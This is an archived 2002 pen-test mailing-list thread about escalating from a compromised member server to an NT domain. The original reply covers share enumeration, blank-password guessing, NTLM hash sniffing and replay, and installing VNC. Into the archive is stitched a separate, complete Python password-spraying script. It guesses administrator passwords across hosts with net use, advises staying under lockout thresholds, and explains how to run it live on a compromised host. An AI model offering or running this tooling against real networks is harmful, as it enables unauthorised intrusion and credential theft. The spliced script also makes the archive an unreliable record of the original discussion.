Re: hacking a NT domain after the member server

From: hofmemi@ey.co.za
Date: Fri Jun 14 2002 - 02:01:05 EDT


Jason,

I have found the quickest way to compromise an NT domain is to try null
or commonly used passwords, i.e. on the server you have compromised
issue the standard domain enumeration commands:

net view /domain
and then
net view /domain:domain_name

then select a few interesting looking hosts and attempt to
connect to the default shares IPC$, C$, Admin$ by using

net use * \\computer_name\c$ /user:administrator

there are usually a few administrator accounts with a blank or
easy-to-guess password. There are also many tools available to
automate this and try brute forcing, e.g. nbtbrute, nat, etc.

With regard to a command line tool for sniffing NTLM hashes your
choices are limited. I would simply use tcpdump to capture
any hashes and then you can either crack them or use them in a
replay attack with a tool like smbproxy.

Of course if the machine is seldom used you could simply
install a remote control program like VNC and load up your
GUI tools ;-)

Rgds

Michael Hofmeyr
eSecurity Services
Ernst & Young - Information Systems Assurance & Advisory Services
Wanderers Office Park, 52 Corlett Drive, Illovo, 2196
South Africa

ICQ: 114086666
Tel: +27 11 772 3784
Fax: +27 11 772 4784
GSM: +27 83 256 3716
Email: hofmemi@ey.co.za
Internet: www.ey.com/southafrica

                                                                                                                   
                    Jason
                    <cisspstudy@ya To: pen-test@securityfocus.com
                    hoo.com> cc:
                                         Subject: hacking a NT domain after the member server
                    2002/06/13
                    10:49 AM
                                                                                                                   
                                                                                                                   

Currently doing a penetration test and managed to compromise a development
SQL server (W2K/SQL 2000) that is a member of the domain.

I am trying to gather additional information from this host that will
allow me to compromise the domain.

There are no accounts on this host that are the same as the domain.
LSA secrets revealed nothing interesting.

Does anyone have any other ideas?

I would like to install a command line NTLM password sniffer. Does anyone
know of one?

However, people rarely use this server and I am unlikely to get any domain
passwords this way.

Any other ideas?

Any help appreciated.
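The enumerate-then-guess procedure Michael describes above (net view /domain to list hosts, then net use against an administrative share with the administrator account and a blank or common password) as a small script. This is an added example and is not code from either message or from any of the tools named in the thread. It assumes it runs on the compromised Windows member server where `net.exe` is on the path; the `net view` output, host names and the one "successful" credential are constructed for the offline demonstration and are not real.

```python
"""Enumerate domain hosts from `net view` output and guess administrator
passwords against an administrative share with `net use`.

Added example for the pen-test thread; assumes a Windows host with net.exe.
All sample data below is constructed, not captured from any network."""
import re
import subprocess
from typing import Callable, Dict, List, Sequence, Tuple

# Constructed sample of `net view /domain:CORP` output. Host names and
# remarks are invented for this example.
SAMPLE_NET_VIEW = """\
Server Name            Remark

-------------------------------------------------------------------------------
\\\\CORPDC1               Primary domain controller
\\\\FILESRV               Shared files
\\\\DEVSQL                Development SQL server
The command completed successfully.

"""

# A host line starts with two backslashes, then the name, then an optional remark.
_HOST_LINE = re.compile(r"^\\\\(\S+)\s*(.*)$")


def parse_net_view(output: str) -> List[Tuple[str, str]]:
    """Return (hostname, remark) pairs from `net view` / `net view /domain:X` output."""
    hosts = []
    for raw in output.splitlines():
        m = _HOST_LINE.match(raw.strip())
        if m:
            hosts.append((m.group(1), m.group(2).strip()))
    return hosts


def net_use_cmd(host: str, share: str, user: str, password: str) -> List[str]:
    """Build `net use \\\\HOST\\SHARE PASSWORD /user:USER`.
    An empty password is passed as "" so net.exe does not prompt for one.
    Qualify the user (HOST\\administrator or DOMAIN\\administrator) to pick
    the local SAM or the domain explicitly."""
    return ["net", "use", f"\\\\{host}\\{share}", password, f"/user:{user}"]


def net_delete_cmd(host: str, share: str) -> List[str]:
    """Drop the session again so a later attempt with other credentials
    to the same host is not refused (system error 1219)."""
    return ["net", "use", f"\\\\{host}\\{share}", "/delete", "/y"]


Runner = Callable[[List[str]], int]


def run_net(cmd: List[str]) -> int:
    """Real runner: execute net.exe on the compromised host; 0 means connected."""
    return subprocess.run(cmd, capture_output=True).returncode


def spray(hosts: Sequence[str], users: Sequence[str], passwords: Sequence[str],
          run: Runner, share: str = "C$", max_guesses: int = 3) -> Dict[str, Tuple[str, str]]:
    """Try each (user, password) against HOST\\share on every host.
    Guessing an account stops after the first hit and after max_guesses
    attempts, to stay under an account-lockout threshold for ordinary
    accounts. Returns {host: (user, password)} for successful logons."""
    hits: Dict[str, Tuple[str, str]] = {}
    for host in hosts:
        for user in users:
            for password in passwords[:max_guesses]:
                if run(net_use_cmd(host, share, user, password)) == 0:
                    hits[host] = (user, password)
                    run(net_delete_cmd(host, share))
                    break
            if host in hits:
                break
    return hits


def fake_runner(valid: Dict[Tuple[str, str, str], int]) -> Runner:
    """Simulated net.exe for offline use: only the listed (host, user, password)
    triples 'connect'; everything else fails. Constructed for this example."""
    def run(cmd: List[str]) -> int:
        if "/delete" in cmd:
            return 0
        host = cmd[2].split("\\")[2]          # \\HOST\share -> HOST
        password, user = cmd[3], cmd[4][len("/user:"):]
        return valid.get((host, user, password), 2)
    return run


if __name__ == "__main__":
    hosts = [h for h, _ in parse_net_view(SAMPLE_NET_VIEW)]
    # Constructed scenario: DEVSQL's local administrator has a blank password.
    sim = fake_runner({("DEVSQL", "administrator", ""): 0})
    print(spray(hosts, ["administrator"], ["", "password", "admin"], sim))
```

On the real host replace `sim` with `run_net`, and feed `parse_net_view` the text of `net view /domain:NAME` captured via `subprocess.run(["net", "view", "/domain:NAME"], capture_output=True, text=True).stdout`. Two caveats the thread does not spell out: keep `max_guesses` below the domain lockout threshold for any account other than the built-in Administrator (that account is not locked out on NT4/2000 unless the admin has enabled it with the resource kit's passprop tool), and every guess is a logon event in the target's security log, so a spray across many hosts is noisy.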

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:22 EDT